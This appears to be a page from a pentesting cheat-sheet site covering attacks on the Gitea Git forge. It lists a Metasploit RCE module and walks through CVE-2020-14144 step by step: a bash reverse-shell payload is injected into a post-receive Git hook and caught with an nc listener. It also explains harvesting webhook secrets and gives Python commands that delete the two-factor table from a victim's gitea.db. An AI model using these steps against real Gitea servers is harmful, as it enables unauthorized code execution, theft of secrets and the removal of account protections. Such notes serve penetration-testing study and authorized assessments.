Exploit Notes

Gitea Pentesting

Last modified: 2023-03-18


Gitea is a forge software package for hosting software development version control using Git.

Common Directories


# OAuth


Get Secrets in Web Hooks

In the existing repository, we may find the secret value in the repository → Settings → Web Hooks.

Git Fetch Remote Code Execution (RCE)


msf> use exploit/multi/http/gitea_git_fetch_rce
msf> (set options)
msf> run

Git Hooks Remote Code Execution (RCE)

It is CVE-2020-14144 .

1. Login

Access to the Gitea dashboard and login as the existing account.

2. Create a New Repository

3. Go to the Repository’s Settings

In the new repository we’ve created, go to Settings → Git Hooks → post-receive.

4. Update to the Reverse Shell Payload

In the post-receive edit page, inject the payload as below:


bash -i >& /dev/tcp/

5. Start Listener in Terminal

To receive the outcoming connection of the git hook, start listener.

nc -lvnp 4444

6. Create the New Repository in Terminal

mkdir test
cd test
touch README.md
git init
git add README.md
git commit -m "first commit"
git remote add origin https://<target-ip>/<username>/test.git
git push -u origin master

After pushing, git hook triggered and execute the reverse shell command.
Now we should get a shell.

Swagger API

We can access to /api/swagger to interact with Swagger API.

Get New Token & Authorize

We need a token to use Swagger API.

  1. Register a new account in Gitea top page.
  2. Go to /user/settings/applications and generate a new token.
  3. Copy the token value e.g. “fa2c2428817d64c1b890d404a905f7be2ffd4bde”.
  4. Go to /api/swagger.
  5. Click “Authorize” button. The modal window opens.
  6. Paste the token in the “Token” section.

Delete the Two-Factor

victim@machine:/gitea/gitea$ python3

>>> import sqlite3
>>> conn=sqlite3.connect('gitea.db')
>>> conn.execute('delete from two_factor')
>>> conn.commit()
>>> conn.close()

Tools by HDKS


Automatic web fuzzer.


Auto reconnaissance CLI.

Hash Cracker

Hash identifier.